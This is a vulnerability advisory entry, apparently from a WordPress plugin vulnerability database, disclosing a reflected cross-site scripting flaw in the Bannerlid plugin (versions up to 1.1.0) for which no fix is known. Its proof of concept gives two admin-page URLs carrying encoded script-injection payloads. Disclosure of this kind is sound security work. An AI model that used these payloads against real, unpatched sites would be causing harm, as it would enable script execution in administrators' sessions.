WordPress Plugin Vulnerabilities

Bannerlid <= 1.1.0 - Reflected XSS

Description

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators

Proof of Concept

Have an admin open URLs:

- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2024-04-05 (about 1 months ago)
Added
2024-04-05 (about 1 months ago)
Last Updated
2024-04-05 (about 1 months ago)

Other